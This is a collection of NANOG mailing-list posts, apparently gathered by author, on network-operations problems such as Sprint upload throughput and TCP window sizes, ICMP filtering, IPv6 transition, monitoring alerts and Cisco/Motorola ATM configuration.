Re: Bandwidth issues in the Sprint network
Some people wanted to know what I found the problem to be. I have discovered. the problem for a fact is the TCP window size on uploads. I have a Linux box that I changed the Window sizes to match and I still get 32k on a upload window and 64k on a download window. With a ping time of 50ms I have a max theoretical throughput of 5.2Mbps Which is about what I was getting. The formula to calculate this is the following. (((Ts/Tw)*Rtd)/1000)+((Ts*8)/(Lr*1000))) Where the following are Ts = Transfer size in Bytes Tw = Tcp Window size in Bytes Rtd = Round trip Delay in milliseconds Lr = Line rate in bps At this point I am still trying to locate the offending device that is changing the window size. After I determine for sure whether the problem is with my router, the sprint network, or another upstream system I will let everybody know what I find. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Monday 07 April 2008, Brian Raaen wrote: I am currently having problems get upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) test always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else. -- Brian Raaen Network Engineer [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
Re: Bandwidth issues in the Sprint network
Currently there is not a proxy server in the network, although when using some of the test on dslreports.com there is a message about compression being used for the upload and to remove proxy settings. I have also been testing using FTP on a *nix server as well. Both the server and PC are connect to a Cisco 2960 switch in the headend that is connected to the 7200 router. I can transfer ftp at about 80Mbps between the PC and the server, so they are not IO bound. The Site I am testing with is a ftp server located in a colo facility that we use and has sufficient bandwidth. This circuit is clean in the sense of not having CRC, framing or other errors but this is a new circuit and we have never gotten more than 5Mbps out of a single session (flow/ip) across the wan. I would have to double check the mtu, but it is currently the default. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Monday 07 April 2008, Brian Raaen wrote: I am currently having problems get upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) test always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else. -- Brian Raaen Network Engineer [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
Re: Bandwidth issues in the Sprint network
I have been using the Java based versions of the speed test. At this point I have had some Sprint people get in contact with me so I will see what they find. Thank you for all your help to everyone. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Monday 07 April 2008, you wrote: I am currently having problems get upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) test always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else. -- Brian Raaen Network Engineer [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
Bandwidth issues in the Sprint network
I am currently having problems get upload bandwidth on a Sprint circuit. I am using a full OC3 circuit. I am doing fine on downloading data, but uploading data I can only get about 5Mbps with ftp or a speedtest. I have tested against multiple networks and this has stayed the same. Monitoring Cacti graphs and the router I do get about 30Mbps total traffic outbound, but individual (flows/ip?) test always seem limited. I would like to know if anyone else sees anything similar, or where I can get help. The assistance I have gotten from Sprint up to this point is that they find no problems. Due to the consistency of 5Mbps I am suspecting rate limiting, but wanted to know if I was overlooking something else. -- Brian Raaen Network Engineer [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
Re: rack power question
Russia (or the USSR at that time) used to use liquid graphite to cool their nuclear reactors, even thought it was flammable of course that was what they were using in Chernobyl. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Tuesday 25 March 2008, you wrote: Dorn Hetzel wrote: Of course, my chemistry is a little rusty, so I'm not sure about the prospects for a non-toxic, non-flammable, non-conductive substance with workable fluid flow and heat transfer properties :) Mineral oil? I'm not sure about the non-flammable part though. Not all oils burn but I'm not sure if mineral oil is one of them. It is used for immersion cooling though. Justin
Re: Transition Planning for IPv6 as mandated by the US Govt
No, and no. Shouldn't be a surprise. (all is the dealbreaker, certain agencies are on the ball, but most are barely experimenting). On Sat, 15 Mar 2008, Glen Kent wrote: : :Hi, : :I was just reading :http://www.whitehouse.gov/omb/egov/b-1-information.html#IPV6, released :some time back in 2005, and it seems that the US Govt. had set the :target date of 30th June 2008 for all federal govt agencies to move :their network backbones to IPv6. This deadline is almost here. Are we :any close for this transition? : :I have another related question: : :Do all ISPs atleast support tunneling the IPv6 pkts to some end point? :For example, is there a way for an IPv6 enthusiast to send his IPv6 :packet from his laptop to a remote IPv6 server in the current :circumstances if his ISP does not actively support native IPv6? : :Cheers, :Glen :
Re: How Not to Multihome
On Mon, 8 Oct 2007, Patrick W. Gilmore wrote: :To be clear, I am not suggesting de-aggregating every CIDR down to / :24s. But the global table doesn't grow any more whether the customer :announces the /24 from their own ASN, or if you muti-originate it :from two upstreams - or just one upstream for that matter. So there :is no legitimate reason to _not_ announce it, but there is a reason :to announce it. Bingo. And, I'd hazard to guess that many readers of this thread have broken more than a single unwritten rule. I recall being chastised relentlessly years back for doing ibgp over a gre tunnel as I saved up for a real trunk. Guess what - it worked wonders in the short term (though I'll admit I'm embarrassed to rehash it). Bottom line (getting back to the original question) is yes, it's ok, so long as you handle due diligence with the owner of the cidr space. RFC, no, courtesy among peers, yup. cheers, brian
RE: Level3 or Broadwing or other issues in Dallas ?
Same thing in Chicago. Brian Knoll -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Ross Vandegrift Sent: Wednesday, September 19, 2007 12:34 PM To: W. Kevin Hunt Cc: nanog@merit.edu Subject: Re: Level3 or Broadwing or other issues in Dallas ? On Wed, Sep 19, 2007 at 12:25:53PM -0500, W. Kevin Hunt wrote: I'm in Louisiana and just lost my OC12 to Bwing/L3. Circuit didn't die, actually received a BGP message to terminate the session. Anyone else seeing anything or got an update? ALL the numbers I have to L3 are busy... Seeing the same exact thing in Newark, DE. Ross
RE: Using Mobile Phone email addys for monitoring
Is it flawed? It depends on your business requirements. If seconds, milliseconds, or even microseconds matter to your mission critical apps (think real-time trading networks) then you would want a 24x7 staffed NOC using an enterpise monitoring system - something like Openview. You wouldn't want to rely on anything that sends emails. Brian Knoll -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Rick Kunkel Sent: Thursday, September 06, 2007 3:46 PM To: nanog@merit.edu Subject: Using Mobile Phone email addys for monitoring Hello folks, First off, apologies if this is off topic. I'm hoping that system and network monitoring tip are enough of a common issue that this falls under the group's charter. We've traditionally used mobile phone email addresses for system notifications, but over the past 6-12 months, it seems to have become increasingly sketchy. For instance, if an application fails to contact a certain service on a certain server, it sends an email (through it's own SMTP service, to avoid a chicken-and-egg prob if/when our main SMTP service fails) to [EMAIL PROTECTED] (Obviously, that was a fake number.) More and more, I'm getting less and less of these notifications. It seems especially prevalent when MANY things are sent at once; if, for example, a central piece fails, and dependent pieces suddenly fail as well. I try to telnet to mailx.tmomail.net port 25 and get sometimes good, sometimes laggy, and sometimes no response. T-Mobile, support levels all the way up to 3 tell me that it's not them, and everything should work wonderfully. Is SMTP to a mobile phone a fundamentally flawed way to do this? Anyone else have any issues, past or present, with this kind of thing? Thanks, Rick Kunkel
Re: Using Mobile Phone email addys for monitoring
: Some mobile phones you can talk to via AT commandset, either :via USB cable or something else. (eg: I have used a Nokia 6230 with usb :cable.. you can also use bluetooth). If you pay $5 or whatnot for unlimited :SMS on a el-cheapo plan, it might work better than using the SMTP gateway :(when tied to Nagios, etc..) as you can send SMS messages with the AT :commandset. : :Assuming, for the moment, that there's a cell signal available in :your data center... Not always the case, unfortunately. I recall a datacenter in BOS that went so far as to nearly eliminate RF using corrugated aluminum inside the walls (you know who you are :) The simple answer is that it depends on how critical such notifications are. Address it as you would your upstream connectivity, and make it as redunant as is justified. For my meager purposes, smtp is usually fine. For truly critical issues, my nms will use a dedicated phone line to dial a handful of on-call techs, with no more info than caller-id. If that id shows up on their phones, immediate investigation is needed. It's embarrassingly primitive, but it's never failed. Cheers, Brian
ICMP being dropped between Global Crossings and Onvoy
I have a network (AS33234) I am trying to support that is downstream from Onvoy on one of their connections. Our monitoring equipment is located in AS4452. Our monitoring system is not able to ping their network through Onvoy. The block seems to be happening at either Global Crossings or Onvoy. We are able to reach them using any protocol other than an ICMP ping (We are able to traceroute). Does anyone else know about or see a similar block going on. I have attached part of a traceroute. 2 suwC6.gig3-1-4.qualitytech.com (216.154.207.145) [AS 20141] 0 msec 0 msec 4 msec 3 suw04-gig1-0-0.qualitytech.com (216.154.207.173) [AS 20141] 0 msec 0 msec 0 msec 4 gig6-2.suwangaeq01w.cr.deltacom.net (66.35.174.165) [AS 6983] 4 msec 0 msec 0 msec 5 * * * 6 pos5-0.atlngapk22w.cr.deltacom.net (66.35.174.101) [AS 6983] 0 msec 4 msec 0 msec 7 so-0-0-0.ar3.DAL1.gblx.net (64.208.169.141) [AS 3549] 4 msec 4 msec 4 msec 8 so1-0-0-622M.ar2.MIN1.gblx.net (67.17.71.34) [AS 3549] 44 msec 44 msec 44 msec 9 WBS-CONNECT-LLC-Minneapolis.ge-2-3-0.409.ar2.MIN1.gblx.net (64.215.81.82) [AS 3549] 44 msec 44 msec 44 msec 10 * * * 11 * * * 12 WikstromTel-7003.onvoy.net (137.192.32.30) [AS 5006] 52 msec 52 msec 56 msec -- Brian Raaen Network Engineer [EMAIL PROTECTED]
Re: Network Inventory Tool
I have not tried it, but this looks promising. http://metanav.uninett.no/ http://en.wikipedia.org/wiki/Network_Administration_Visualized Hope this helps -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Monday 13 August 2007 23:31, Wguisa71 wrote: Guys, Does anyone known some tool for network documentation with: - inventory (cards, serial numbers, manufactor...) - documentation (configurations, software version control, etc) - topology building (L2, L3.. connections, layer control, ...) All-in-one solution and It don't need to be free. I'm just looking for some thing to control the equipments we have like routers from some sort of suppliers, etc... Marcio
Re: Problems with either Cisco.com or ATT?
I get the same thing in Atlanta. I can't pull up their site and it looks like my trace dies the same place as yours. [EMAIL PROTECTED]:~$ traceroute www.cisco.com traceroute to www.cisco.com (198.133.219.25), 30 hops max, 40 byte packets 1 gw_alpha.america.net (69.60.176.65) 1.618 ms 1.499 ms 1.559 ms 2 69.60.176.21 (69.60.176.21) 9.625 ms 9.461 ms 9.439 ms 3 gwF20.Edelta.america.net (69.60.160.1) 9.260 ms 9.113 ms 9.392 ms 4 66.0.192.194 (66.0.192.194) 16.189 ms 9.219 ms 9.234 ms 5 suwC6.gig3-1-4.qualitytech.com (216.154.207.145) 13.064 ms 9.316 ms 10.029 ms 6 suw04-gig1-0-0.qualitytech.com (216.154.207.173) 41.053 ms 9.432 ms 9.315 ms 7 gig5-1.suwangaeq00w.xr.deltacom.net (66.35.174.125) 34.815 ms 9.871 ms 25.280 ms 8 pos5-0.atlngapk22w.cr.deltacom.net (66.35.174.101) 19.050 ms 40.288 ms 13.137 ms 9 pos1-0.brhmalwd6aw.cr.deltacom.net (66.35.174.13) 17.860 ms 15.823 ms 15.881 ms 10 12.117.136.41 (12.117.136.41) 22.890 ms 18.614 ms 19.742 ms 11 tbr2.attga.ip.att.net (12.123.20.14) 76.260 ms 75.531 ms 75.004 ms 12 tbr1.dlstx.ip.att.net (12.122.2.89) 70.993 ms 70.863 ms 71.373 ms 13 tbr1.la2ca.ip.att.net (12.122.10.50) 74.889 ms 75.098 ms 74.921 ms 14 gar1.sj2ca.ip.att.net (12.122.2.249) 73.098 ms 72.969 ms 72.849 ms 15 * * -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Wednesday 08 August 2007 14:17, Paul Ferguson wrote: No idea -- maybe just a hiccup? From my office in San Jose: %traceroute www.cisco.com Tracing route to www.cisco.com [198.133.219.25] over a maximum of 30 hops: [snip] 7 3 ms 3 ms 3 ms so-3-0-0.mpr2.sjc7.us.above.net [64.125.30.173] 8 3 ms 3 ms 3 ms above-att.sjc7.us.above.net [64.125.13.50] 9 7 ms 7 ms 7 ms tbr1.sffca.ip.att.net [12.123.12.2] 10 6 ms 6 ms 6 ms gbr5.sffca.ip.att.net [12.122.11.74] 11 6 ms 6 ms 6 ms gar1.sj2ca.ip.att.net [12.122.2.253] 12 *** Request timed out. 13 *** Request timed out. 14 * ^C From MIT: Tracing to: www.cisco.com 1 legacy26-0.default.csail.mit.edu (18.26.0.1) [AS3] 0 ms 0 ms 0 ms 2 kalgan.trantor.csail.mit.edu (128.30.0.245) [AS40] 0 ms 0 ms 0 ms 3 B24-RTR-2-CSAIL.MIT.EDU (18.4.7.1) [AS3] 0 ms 0 ms 0 ms 4 EXTERNAL-RTR-1-BACKBONE.MIT.EDU (18.168.0.18) [AS3] 1 ms 4 ms 2 ms 5 ge-6-23.car2.Boston1.Level3.net (4.79.2.1) [AS3356] 0 ms * 0 ms 6 * * ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) [AS3356] 8 ms 7 ae-61-61.csw1.NewYork1.Level3.net (4.69.134.66) [AS3356] 10 ms 5 ms 16 ms 8 ae-13-69.car3.NewYork1.Level3.net (4.68.16.5) [AS3356] 67 ms 59 ms 58 ms 9 att-level3-oc192.NewYork1.Level3.net (4.68.127.150) [AS3356] 17 ms 127 ms 12 ms 10 tbr1.n54ny.ip.att.net (12.123.3.57) [] [MPLS: Label 31537 Exp 0] 80 ms 79 ms 79 ms 11 12.122.16.153 (12.122.16.153) [] [MPLS: Label 19 Exp 0] 76 ms 77 ms 77 ms 12 cr1.cgcil.ip.att.net (12.122.1.190) [] [MPLS: Label 1188 Exp 0] 77 ms 76 ms 77 ms 13 12.122.17.146 (12.122.17.146) [] [MPLS: Label 31051 Exp 0] 77 ms 78 ms 78 ms 14 tbr1.sffca.ip.att.net (12.122.10.6) [] [MPLS: Label 31320 Exp 0] 78 ms 78 ms 78 ms 15 gbr5.sffca.ip.att.net (12.122.11.74) [] [MPLS: Label 323 Exp 0] 72 ms 71 ms 71 ms 16 gar1.sj2ca.ip.att.net (12.122.2.253) [] 76 ms 76 ms 77 ms 17 * * * 18 * * * 19 * * * 20 * * * - ferg -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/
Re: Problems getting Cisco router and Motorola Nextlevel system to work together
This router has a G-1 engine with 512 DRAM. I would stop using IRB, but it appears that the way that motorola has implemented pvc's is very difficult to work around. The Molorola middleware is dynamically assigning the pvc. Yes... I have personly seen a CPE device change their vci after a period of time. The device did not change ports or anything else but was provisioned to a different vci after just sitting there. Thanks for the suggestions so far. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Tuesday 24 July 2007 16:25, you wrote: The router is currently configured to use IRB which is a hybrid process. The problems is that the IRB process is overloaded and is dropping traffic faster than it can process it. Which NPE is in this router? Basically, the 7200 has underpowered CPUs and if you force it to process switch, then it handles a LOT LESS packets per second than you might think. I expect that your config is forcing process switching rather than fast switching. The only three solutions are A) run less traffic through the 7200 so that process switching can cope B) stop using the feature that forces process switching C) replace the 7200 with a 7300 which will probably not have CPU issues. However, not knowing the specifics of what IRB is doing, I would advise you to test a replacement platform before committing to it. Oh well, maybe 4 solutions. If you are using a weak NPE such as NPE-200 you may be able to get some joy by upgrading to a more powerful one. For instance an NPE-400 should handle roughly twice the load of an NPE-200. --Michael Dillon
Re: Problems getting Cisco router and Motorola Nextlevel system to work together
The buffers are overloading and dropping traffic. With a Cisco TAC case, the tech had me increase the buffers so much it wasn't even funny. The only problem was about and hour after we tried to tune the buffers, things got very bad and I had clear them to default to stop a very ugly bigger outage. This system does indeed involve IPTV set top boxes. I am unable to use RBE since the PVC provisioning may change on the units and the VC would not match what the dhcp lease was originally on. The way that this Motorola system implements PVCs baffles me, it does not make any sense to me. They are dynamically changing the vci assigning it out of a pool, just like DHCP does with IPs. The circuits are not SVCs and the endpoint router is seeing things change so this is not SPVCs either. I am trying to think of a way the change this to work with RBE switching, but the dynamic PVCs are throwing a monkey wrench into things. Thank for the help. -- Brian Raaen Network Engineer [EMAIL PROTECTED] On Tuesday 24 July 2007 22:58, you wrote: We should probably move this over to cisco-nsp. I'd be interested to see a 'sh buffers' because if it's process switching that much data I bet the buffers are thrashing. I seem to remember working on something very similar to that 4 or 5 years ago when a customer has brigding over a bunch of ATM PVC's and they told me it was some type of IPTV set top box. We tuned the buffers really high so they didn't trim back and it worked. We also do some bridging under interrupt without process switching too last time I checked so some more data would be helpful. Move it over to [EMAIL PROTECTED] and we can help more on the Cisco side if you want. Rodney On Tue, Jul 24, 2007 at 09:25:49PM +0100, [EMAIL PROTECTED] wrote: The router is currently configured to use IRB which is a hybrid process. The problems is that the IRB process is overloaded and is dropping traffic faster than it can process it. Which NPE is in this router? Basically, the 7200 has underpowered CPUs and if you force it to process switch, then it handles a LOT LESS packets per second than you might think. I expect that your config is forcing process switching rather than fast switching. The only three solutions are A) run less traffic through the 7200 so that process switching can cope B) stop using the feature that forces process switching C) replace the 7200 with a 7300 which will probably not have CPU issues. However, not knowing the specifics of what IRB is doing, I would advise you to test a replacement platform before committing to it. Oh well, maybe 4 solutions. If you are using a weak NPE such as NPE-200 you may be able to get some joy by upgrading to a more powerful one. For instance an NPE-400 should handle roughly twice the load of an NPE-200. --Michael Dillon
Where did freeipdb IP utility site go?
I was trying to investigate some the ip management tools and followed the link www.freeipdb.org and was more than a little upset with what I found. This domain name apparently has been taken by a porn site that is wanting to auction it off. does anyone know if the project died or if it changed domain names. I have removed the reference to it in the wiki page, but there are other references to the site on the NANOG site. I am not sure who will need to remove the links, but they no longer point to an ip management tool. If the utility still exist I would be intersted in finding it, as I saw not able to dig it up on a quick Google search. -- Brian Raaen Network Engineer [EMAIL PROTECTED]
Problems getting Cisco router and Motorola Nextlevel system to work together
I am having some difficulties involving using a Cisco 7200 router to terminate ATM sessions from a motorola nextlevel IPTV system. The router is currently configured to use IRB which is a hybrid process. The problems is that the IRB process is overloaded and is dropping traffic faster than it can process it. I opened a case with Cisco TAC, and they recommended using RBE instead of IRB. While I have been trying to plan migrating the system to RBE I discovered that Motorola uses a concept called dynamic pvc's to assign the pvc's to the CPE devices (a IPTV unit that has a data port). The device uses two PVC's one for data and one for IPTV. The system dynamically assigns the PVCs when the CPE devices connects. This looks like it would not work with RBE, since the pvc can change before the dhcp lease expires. Having this router dropping traffic, has been causing severe problems for end users and is causing an ongoing system outage. I am currently trying to work with both Motorola and Cisco, however both vendors are blaming the problem on the other vendor. I am not sure what to do. Motorola says their system only works with IRB and Cisco says the router will not function with this size network using IRB. Has anyone else arrived at a working solution using a Cisco 7200 router to terminate a Motorola nextlevel system support approximately 2000-3000 end users. I would be extremely gratefull if anyone who has worked with this type of system could help shed some light on this problem. Thank you in advance. -- Brian Raaen Network Engineer braaen (at) zcorum (dot) com
RE: TCP congestion
In order to solve this, you need to see a trace from both sides of the WAN. Which side is your trace from? Can you see the original ACK on both ends? If the receiver is sending a DUP ACK, then the sender either never received the first ACK or it didn't receive it within the timeframe it expected. Brian -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Philip Lavine Sent: Thursday, July 12, 2007 1:07 PM To: nanog Subject: TCP congestion Can someone explain how a TCP conversation could degenerate into congestion avoidance on a long fat pipe if there is no packet/segment loss or out of order segments? Here is the situation: WAN = 9 Mbps ATM connection between NY and LA (70 ms delay) LAN = Gig Ethernet Receiver: LA server = Win2k3 Sender: NY server = Linux 2.4 Data transmission typical = bursty but never more that 50% of CIR Segment sizes = 64k to 1460k but mostly less than 100k Typical Problem Scenario: Data transmission is humming along consistently at 2 Mbps, all of a sudden transmission rates drop to nothing then pickup again after 15-20 seconds. Prior to the drop off (based on packet capture) there is usually a DUP ACK/SACK coming from the receiver followed by the Retransmits and congestion avoidence. What is strange is there is nothing prior to the drop off that would be an impetus for congestion (no high BW utilization or packet loss). Also is there any known TCP issues between linux 2.4 kernel and windows 2003 SP1? Mainly are there issues regarding the handling of SACK, DUP ACK's and Fast Retransmits. Of course we all know that this is not a application issue since developers make flawless socket code, but if it is network issue how is caused? Philip Take the Internet to Go: Yahoo!Go puts the Internet in your pocket: mail, news, photos more. http://mobile.yahoo.com/go?refer=1GNXIC
RE: TCP congestion
Are you using TCP offloading on your windows box? I have seen issues with that in the past where it was dropping data. Turn it off and see if the issue goes away. Are other the other connections traversing this path seeing the same issues? Still - the only definitive way to solve the problem is by getting captures from both ends. If you can isolate your wan with taps on each side and see packets being dropped, you know it's your ATM circuit. QOS will not help you if you aren't exceeding bandwidth. Thanks, Brian Knoll Senior Network Engineer, TTNET 312-698-6017 desk 312-823-0957 mobile -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Philip Lavine Sent: Thursday, July 12, 2007 3:28 PM To: Stephen Wilcox Cc: nanog Subject: Re: TCP congestion I just don't understand how if there is 1 segment that gets lost how this could translate to such a catastrophic long period of slow-start. How can I minimize the impact of the inevitable segment loss/out of order over a WAN. Is QoS the only option? - Original Message From: Stephen Wilcox [EMAIL PROTECTED] To: Philip Lavine [EMAIL PROTECTED] Cc: nanog nanog@merit.edu Sent: Thursday, July 12, 2007 1:09:24 PM Subject: Re: TCP congestion Well, if its out of order its the same as if its lost or delayed, it needs to see that missing segment before the window is full As mentioned you need to get dumps from both ends, you will almost definitely find that you have packet loss which tripped tcp's slow start mechanism. Steve On Thu, Jul 12, 2007 at 12:02:49PM -0700, Philip Lavine wrote: Even if the segment was received out of order what would cause congestion avoidance to starve the connection of legitimate traffic for 15 to 20 seconds? That is the core of the problem. - Original Message From: Fred Baker [EMAIL PROTECTED] To: Brian Knoll [EMAIL PROTECTED] Cc: Philip Lavine [EMAIL PROTECTED]; nanog nanog@merit.edu Sent: Thursday, July 12, 2007 11:56:06 AM Subject: Re: TCP congestion On Jul 12, 2007, at 11:42 AM, Brian Knoll ((TTNET)) wrote: If the receiver is sending a DUP ACK, then the sender either never received the first ACK or it didn't receive it within the timeframe it expected. or received it out of order. Yes, a tcpdump trace is the first step. Be a better Globetrotter. Get better travel answers from someone who knows. Yahoo! Answers - Check it out. http://answers.yahoo.com/dir/?link=listsid=396545469 Pinpoint customers who are looking for what you sell. http://searchmarketing.yahoo.com/
RE: trans-Atlantic latency?
A reasonable latency to expect between Chicago and London would be 92ms RTT. Brian Knoll -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Neal R Sent: Thursday, June 28, 2007 6:21 PM To: nanog@merit.edu Subject: trans-Atlantic latency? I have a customer with IP transport from Sprint and McLeod and fiber connectivity to Sprint in the Chicago area. The person making the decisions is not a routing guy but is very sharp overall. He is currently examining the latency on trans-Atlantic links and has fixed on the idea that he needs 40ms or less to London through whatever carrier he picks. He has spoken to someone at Cogent about a point to point link. What is a reasonable latency to see on a link of that distance? I get the impression he is shopping for something that involves dilithium crystal powered negative latency inducers, wormhole technology, or an ethernet to tachyon bridge, but its been a long time (9/14/2001, to be exact) since I've had a trans-Atlantic circuit under my care and things were different back then. Anyone care to enlighten me on what these guys can reasonably expect on such a link? My best guess is he'd like service from Colt based on the type of customer he is trying to reach, but its a big muddle and I don't get to talk to all of the players ...
Re: NOC Personel Question (Possibly OT)
Todd Christell wrote: Greetings, Sorry if this is OT but we are having a discussion with our HR department. We are in the process of getting a 24 X 7 NOC in place and HR has a problem with calling them NOC Specialist. What is the generally accepted title? Thanks in advance, Todd Christell SpringNet Network Manager 417.831.8688 At a previous employer, L1 nocsters were network technicians, L2 people were network analysts. Then above them were system and network engineers, and above them system and network architects. Briam
Re: FCC on wifi at hotel
Brandon Galbraith wrote: On 2/28/07, *Steve Meuse* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: On 2/28/07, *Jared Mauch* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: http://hraunfoss.fcc.gov/edocs_public/attachmatch/FCC-06-157A1.pdf http://hraunfoss.fcc.gov/edocs_public/attachmatch/FCC-06-157A1.pdf I do suggest reading this. They can not legally bar you from using the devices. They can charge you outrageous fees to get to/from the MMR or telco demarc and make it prohibitively expensive. Right, a wifi that goes nowhere isn't terribly useful :) You could always get to upstream via wireless. -brandon a small number of wifi users with a card in a laptop to get to cellular broadband, itd be pretty easy.. Brian
Re: what the heck do i do now?
On Wed, 31 Jan 2007, Barry Shein wrote: :One problem we have is that we tend to see the internet as a perfect :simulation of a fair and just system, at least as a first goal. : :I don't know if that's possible or not. I don't know if anyone has :actually explored the issue deeply. One problem is that there are many :different notions of justice present globally. Probably thousands with :significant real-world referents. : : Ultimately, the problem is that the idealism which was more or less the rule a decade ago has taken a backseat to commercialism and what some see as practicality; and arguably, some consider such a reasonable excuse for lax maintenance (to the tune of if it's not hurting me/my customers, it's not a priority). Considering the time passed since maps went defunct, Paul is entirely justified in doing whatever is necessary to cluebat the offending networks, imho.
Re: Undersea fiber cut after Taiwan earthquake - PCCW / Singtel / KT e tc connectivity disrupted
That's news? The same still happens with much land-based sonet, where diverse paths still share the same entrance to a given facility. Unless each end can negotiate cost sharing for diverse paths, or unless the owner of the fiber can cost justify the same, chances are you're not going to see the ideal. Money will always speak louder than idealism. Undersea paths complicate this even further. On Sun, 21 Jan 2007, Rod Beck wrote: :What's really interesing is the fragility of the existing telecom infrastructure. These six cables were apparently very close to each other in the water. In other words, despite all the preaching about physical diversity, it was ignored in practice. Indeed, undersea cables very often use the same conduits for terrestrial backhaul since it is the most cost effective solution. However, that means that diversifying across undersea cables does not buy the sort of physical diversity that is anticipated. : :Roderick S. Beck :EMEA and North American Sales :Hibernia Atlantic
RE: decline of customer service
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Philip Lavine Sent: Monday, September 25, 2006 11:50 PM To: nanog Subject: decline of customer service Times have changed, My experience has been recently that ISP's and ASP's have dramatically malnourished their first level support staff which in turn has created a resentful and lazy second teir. I am sick of the It must be your network/cabling/CPE attitude that I am getting from some teir 1 ISP's. I sick of replacing CSU's and checking extended demarcs while some clown in the POP is re-seating cards in the mux. Moreover stop accusing my network of latency issues. I ran the packet capture 100 times and the client is still send a FIN. The reason your application is slow is because your programmers think sockets are something you plug a can opener into. Finally, YOU are my vendor. I pay you money for exceptional service. Thank you for your time. Uh OK. Where did this come from? Did Philip have a seisure? ARE YOU OK PHILIP? :-P Brian
SORBS Contact
Can someone from SORBS contact me offlist if they are on hereMy most recent allocation from ARIN turned out to be dirty IP's, and I'm having trouble getting them removed following the steps on their website (no action on tickets opened). 64.79.128.0/20Brian Boles[EMAIL PROTECTED]
RE: APC Matrix 5000 question(s)
Hi, i am very sure that the batterys are dead. APC recommends to change the batterys every 3 to 5 years. I'd change them every 3 years to be sure. Its very unlikely that your 6 year old packs are still fully functional. I had the same symptoms at a customers APC (3000VA) and the battery packs were dead. Try to locate the packs on ebay, can save quite a bunch of money (but beware of low quality packs). http://stores.ebay.com/Gruber-Power-Services I've used them multiple times and been very happy. Malcolm I have used them as well and been fairly happy. Beware that they will spam you to death (and responding to their mailings with removal requests continue to go unanswered). Brian
Re: wrt joao damas' DLV talk on wednesday
On Jun 13, 2006, at 11:55, Randy Bush wrote: but what leaves me wondering is why this is all so difficult. Possibly because many people find writing formal security policies, which I think is what we're really talking about here, to be a dry and unpleasant experience, much less fun that code-hacking or packet- analyzing or whatever else you can find to do instead. why can isc not simply say we plan to vet zones as follows:. and we plan to manage maintenance of key rollover as follows: etc.? Would it help if I volunteered to talk to folks and help write something up? I mean, if there's some other issue that is preventing ISC from nailing this down, then that's one thing. But if it's just a case of never seems to bubble up to the top of the stack, then maybe a little outside assistance can do the trick. Besides, now that the semester's over, I need something besides just firing off resumes (gotta fill that summer time, and not completely lose touch with the Real World!) to keep myself entertained. You may flame when ready, Gridley. -- Brian McMahon brian dot mcmahon at cabrillo dot edu Computer Networking and System Administration Instructor Cabrillo College, Aptos, California
RE: private ip addresses from ISP
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Joe Maimon Sent: Tuesday, May 23, 2006 10:15 AM To: Robert Bonomi Cc: [EMAIL PROTECTED] Subject: Re: private ip addresses from ISP Robert Bonomi wrote: TTL-E messages _do_ have legitimate function in network management. TTL-E messages _can_ originate from RFC1918 space, addressed to 'public internet' addresses. Usefully, and meaningfully. Ever hear of 'traceroute'? Ever use it where packets went across a network using RFC1918 internally? Ever had a route die _between_ two RFC1918 addressed nodes on somebody elses network? I guess this means that providers who utilize rfc1918 along their hops should make an effort to ensure these addresses are not used for icmp messages or translate these addresses when they source icmp. Understandably, translation on providers networks is not always feasible. A feature on routers that sourced icmp packets to be told specificaly which address of the router to source it from would also help. In the Cisco world, I thought that the source would always be the interface that replies to the ICMP packet. That seems to be good form to me. Where am I going wrong?
Re: Geo location to IP mapping
cough scam_snake_oil_etc /cough On Mon, 15 May 2006, Alain Hebert wrote: : :GeoIP - http://www.maxmind.com/geoip/ : :Ashe Canvar wrote: : : : Hi all, : : Can any of you please recommend some IP-to-geo mapping database / web : service ? : : I would like to get resolution down to city if possible. : : Thanks and Regards,
Re: Geo location to IP mapping
